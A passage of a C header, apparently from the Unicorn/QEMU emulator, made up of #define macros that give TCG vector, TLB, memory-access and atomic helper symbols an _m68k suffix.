tcg_gen_gvec_andc_m68k #define tcg_gen_gvec_orc tcg_gen_gvec_orc_m68k #define tcg_gen_gvec_nand tcg_gen_gvec_nand_m68k #define tcg_gen_gvec_nor tcg_gen_gvec_nor_m68k #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_m68k #define tcg_gen_gvec_ands tcg_gen_gvec_ands_m68k #define tcg_gen_gvec_andi tcg_gen_gvec_andi_m68k #define tcg_gen_gvec_xors tcg_gen_gvec_xors_m68k #define tcg_gen_gvec_xori tcg_gen_gvec_xori_m68k #define tcg_gen_gvec_ors tcg_gen_gvec_ors_m68k #define tcg_gen_gvec_ori tcg_gen_gvec_ori_m68k #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_m68k #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_m68k #define tcg_gen_gvec_shli tcg_gen_gvec_shli_m68k #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_m68k #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_m68k #define tcg_gen_gvec_shri tcg_gen_gvec_shri_m68k #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_m68k #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_m68k #define tcg_gen_gvec_sari tcg_gen_gvec_sari_m68k #define tcg_gen_gvec_shls tcg_gen_gvec_shls_m68k #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_m68k #define tcg_gen_gvec_sars tcg_gen_gvec_sars_m68k #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_m68k #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_m68k #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_m68k #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_m68k #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_m68k #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_m68k #define vec_gen_2 vec_gen_2_m68k #define vec_gen_3 vec_gen_3_m68k #define vec_gen_4 vec_gen_4_m68k #define tcg_gen_mov_vec tcg_gen_mov_vec_m68k #define tcg_const_zeros_vec tcg_const_zeros_vec_m68k #define tcg_const_ones_vec tcg_const_ones_vec_m68k #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_m68k #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_m68k #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_m68k #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_m68k #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_m68k #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_m68k #define tcg_gen_dupi_vec tcg_gen_dupi_vec_m68k #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_m68k #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_m68k #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_m68k #define tcg_gen_ld_vec tcg_gen_ld_vec_m68k #define tcg_gen_st_vec tcg_gen_st_vec_m68k #define tcg_gen_stl_vec tcg_gen_stl_vec_m68k #define tcg_gen_and_vec tcg_gen_and_vec_m68k #define tcg_gen_or_vec tcg_gen_or_vec_m68k #define tcg_gen_xor_vec tcg_gen_xor_vec_m68k #define tcg_gen_andc_vec tcg_gen_andc_vec_m68k #define tcg_gen_orc_vec tcg_gen_orc_vec_m68k #define tcg_gen_nand_vec tcg_gen_nand_vec_m68k #define tcg_gen_nor_vec tcg_gen_nor_vec_m68k #define tcg_gen_eqv_vec tcg_gen_eqv_vec_m68k #define tcg_gen_not_vec tcg_gen_not_vec_m68k #define tcg_gen_neg_vec tcg_gen_neg_vec_m68k #define tcg_gen_abs_vec tcg_gen_abs_vec_m68k #define tcg_gen_shli_vec tcg_gen_shli_vec_m68k #define tcg_gen_shri_vec tcg_gen_shri_vec_m68k #define tcg_gen_sari_vec tcg_gen_sari_vec_m68k #define tcg_gen_cmp_vec tcg_gen_cmp_vec_m68k #define tcg_gen_add_vec tcg_gen_add_vec_m68k #define tcg_gen_sub_vec tcg_gen_sub_vec_m68k #define tcg_gen_mul_vec tcg_gen_mul_vec_m68k #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_m68k #define tcg_gen_usadd_vec tcg_gen_usadd_vec_m68k #define tcg_gen_sssub_vec tcg_gen_sssub_vec_m68k #define tcg_gen_ussub_vec tcg_gen_ussub_vec_m68k #define tcg_gen_smin_vec tcg_gen_smin_vec_m68k #define tcg_gen_umin_vec tcg_gen_umin_vec_m68k #define tcg_gen_smax_vec tcg_gen_smax_vec_m68k #define tcg_gen_umax_vec tcg_gen_umax_vec_m68k #define tcg_gen_shlv_vec tcg_gen_shlv_vec_m68k #define tcg_gen_shrv_vec tcg_gen_shrv_vec_m68k #define tcg_gen_sarv_vec tcg_gen_sarv_vec_m68k #define tcg_gen_shls_vec tcg_gen_shls_vec_m68k #define tcg_gen_shrs_vec tcg_gen_shrs_vec_m68k #define tcg_gen_sars_vec tcg_gen_sars_vec_m68k #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_m68k #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_m68k #define tb_htable_lookup tb_htable_lookup_m68k #define tb_set_jmp_target tb_set_jmp_target_m68k #define cpu_exec cpu_exec_m68k #define cpu_loop_exit_noexc cpu_loop_exit_noexc_m68k #define cpu_reloading_memory_map cpu_reloading_memory_map_m68k #define cpu_loop_exit cpu_loop_exit_m68k #define cpu_loop_exit_restore cpu_loop_exit_restore_m68k #define cpu_loop_exit_atomic cpu_loop_exit_atomic_m68k #define tlb_init tlb_init_m68k #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_m68k #define tlb_flush tlb_flush_m68k #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_m68k #define tlb_flush_all_cpus tlb_flush_all_cpus_m68k #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_m68k #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_m68k #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_m68k #define tlb_flush_page tlb_flush_page_m68k #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_m68k #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_m68k #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_m68k #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_m68k #define tlb_protect_code tlb_protect_code_m68k #define tlb_unprotect_code tlb_unprotect_code_m68k #define tlb_reset_dirty tlb_reset_dirty_m68k #define tlb_set_dirty tlb_set_dirty_m68k #define tlb_set_page_with_attrs tlb_set_page_with_attrs_m68k #define tlb_set_page tlb_set_page_m68k #define get_page_addr_code_hostp get_page_addr_code_hostp_m68k #define get_page_addr_code get_page_addr_code_m68k #define probe_access probe_access_m68k #define tlb_vaddr_to_host tlb_vaddr_to_host_m68k #define helper_ret_ldub_mmu helper_ret_ldub_mmu_m68k #define helper_le_lduw_mmu helper_le_lduw_mmu_m68k #define helper_be_lduw_mmu helper_be_lduw_mmu_m68k #define helper_le_ldul_mmu helper_le_ldul_mmu_m68k #define helper_be_ldul_mmu helper_be_ldul_mmu_m68k #define helper_le_ldq_mmu helper_le_ldq_mmu_m68k #define helper_be_ldq_mmu helper_be_ldq_mmu_m68k #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_m68k #define helper_le_ldsw_mmu helper_le_ldsw_mmu_m68k #define helper_be_ldsw_mmu helper_be_ldsw_mmu_m68k #define helper_le_ldsl_mmu helper_le_ldsl_mmu_m68k #define helper_be_ldsl_mmu helper_be_ldsl_mmu_m68k #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_m68k #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_m68k #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_m68k #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_m68k #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_m68k #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_m68k #define cpu_ldub_data_ra cpu_ldub_data_ra_m68k #define cpu_ldsb_data_ra cpu_ldsb_data_ra_m68k #define cpu_lduw_data_ra cpu_lduw_data_ra_m68k #define cpu_ldsw_data_ra cpu_ldsw_data_ra_m68k #define cpu_ldl_data_ra cpu_ldl_data_ra_m68k #define cpu_ldq_data_ra cpu_ldq_data_ra_m68k #define cpu_ldub_data cpu_ldub_data_m68k #define cpu_ldsb_data cpu_ldsb_data_m68k #define cpu_lduw_data cpu_lduw_data_m68k #define cpu_ldsw_data cpu_ldsw_data_m68k #define cpu_ldl_data cpu_ldl_data_m68k #define cpu_ldq_data cpu_ldq_data_m68k #define helper_ret_stb_mmu helper_ret_stb_mmu_m68k #define helper_le_stw_mmu helper_le_stw_mmu_m68k #define helper_be_stw_mmu helper_be_stw_mmu_m68k #define helper_le_stl_mmu helper_le_stl_mmu_m68k #define helper_be_stl_mmu helper_be_stl_mmu_m68k #define helper_le_stq_mmu helper_le_stq_mmu_m68k #define helper_be_stq_mmu helper_be_stq_mmu_m68k #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_m68k #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_m68k #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_m68k #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_m68k #define cpu_stb_data_ra cpu_stb_data_ra_m68k #define cpu_stw_data_ra cpu_stw_data_ra_m68k #define cpu_stl_data_ra cpu_stl_data_ra_m68k #define cpu_stq_data_ra cpu_stq_data_ra_m68k #define cpu_stb_data cpu_stb_data_m68k #define cpu_stw_data cpu_stw_data_m68k #define cpu_stl_data cpu_stl_data_m68k #define cpu_stq_data cpu_stq_data_m68k #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_m68k #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_m68k #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_m68k #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_m68k #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_m68k #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_m68k #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_m68k #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_m68k #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_m68k #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_m68k #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_m68k #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_m68k #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_m68k #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_m68k #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_m68k #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_m68k #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_m68k #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_m68k #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_m68k #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_m68k #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_m68k #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_m68k #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_m68k #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_m68k #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_m68k #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_m68k #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_m68k #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_m68k #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_m68k #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_m68k #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_m68k #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_m68k #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_m68k #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_m68k #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_m68k #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_m68k #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_m68k #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_m68k #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_m68k #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_m68k #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_m68k #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_m68k #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_m68k #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_m68k #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_m68k #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_m68k #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_m68k #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_m68k #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_m68k #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_m68k #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_m68k #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_m68k #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_m68k #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_m68k #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_m68k #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_m68k #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_m68k #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_m68k #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_m68k #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_m68k #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_m68k #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_m68k #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_m68k #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_m68k #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_m68k #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_m68k #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_m68k #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_m68k #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_m68k #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_m68k #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_m68k #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_m68k #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_m68k #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_m68k #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_m68k #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_m68k #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_m68k #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_m68k #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_m68k #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_m68k #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_m68k #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_m68k #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_m68k #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_m68k #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_m68k #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_m68k #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_m68k #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_m68k #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_m68k #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_m68k #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_m68k #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_m68k #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_m68k #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_m68k #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_m68k #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_m68k #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_m68k #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_m68k #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_m68k #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_m68k #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_m68k #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_m68k #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_m68k #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_m68k #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_m68k #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_m68k #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_m68k #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_m68k #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_m68k #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_m68k #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_m68k #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_m68k #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_m68k #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_m68k #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_m68k #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_m68k #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_m68k #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_m68k #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_m68k #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_m68k #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_m68k #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_m68k #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_m68k #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_m68k #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_m68k #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_m68k #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_m68k #define helper_atomic_xchgb helper_atomic_xchgb_m68k #define helper_atomic_fetch_addb helper_atomic_fetch_addb_m68k #define helper_atomic_fetch_andb helper_atomic_fetch_andb_m68k #define helper_atomic_fetch_orb helper_atomic_fetch_orb_m68k #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_m68k #define helper_atomic_add_fetchb helper_atomic_add_fetchb_m68k #define helper_atomic_and_fetchb helper_atomic_and_fetchb_m68k #define helper_atomic_or_fetchb helper_atomic_or_fetchb_m68k #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_m68k #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_m68k #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_m68k #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_m68k #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_m68k #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_m68k #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_m68k #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_m68k #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_m68k #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_m68k #define helper_atomic_xchgw_le helper_atomic_xchgw_le_m68k #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_m68k #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_m68k #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_m68k #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_m68k #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_m68k #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_m68k #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_m68k #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_m68k #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_m68k #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_m68k #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_m68k #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_m68k #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_m68k #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_m68k #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_m68k #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_m68k #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_m68k #define helper_atomic_xchgw_be helper_atomic_xchgw_be_m68k #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_m68k #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_m68k #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_m68k #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_m68k #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_m68k #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_m68k #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_m68k #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_m68k #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_m68k #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_m68k #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_m68k #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_m68k #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_m68k #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_m68k #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_m68k #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_m68k #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_m68k #define helper_atomic_xchgl_le helper_atomic_xchgl_le_m68k #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_m68k #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_m68k #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_m68k #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_m68k #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_m68k #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_m68k #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_m68k #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_m68k #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_m68k #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_m68k #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_m68k #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_m68k #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_m68k #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_m68k #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_m68k #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_m68k #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_m68k #define helper_atomic_xchgl_be helper_atomic_xchgl_be_m68k #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_m68k #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_m68k #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_m68k #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_m68k #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_m68k #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_m68k #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_m68k #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_m68k #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_m68k #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_m68k #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_m68k #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_m68k #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_m68k #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_m68k #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_m68k #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_m68k #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_m68k #define helper_atomic_xchgq_le helper_atomic_xchgq_le_m68k #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_m68k #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_m68k #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_m68k #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_m68k #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_m68k #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_m68k #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_m68k #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_m68k #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_m68k #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_m68k #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_m68k #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_m68k #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_m68k #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_m68k #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_m68k #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_m68k #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_m68k #define helper_atomic_xchgq_be helper_atomic_xchgq_be_m68k #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_m68k #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_m68k #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_m68k #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_m68k #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_m68k #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_m68k #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_m68k #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_m68k #define helper_atomic_fetch_smaxq_be 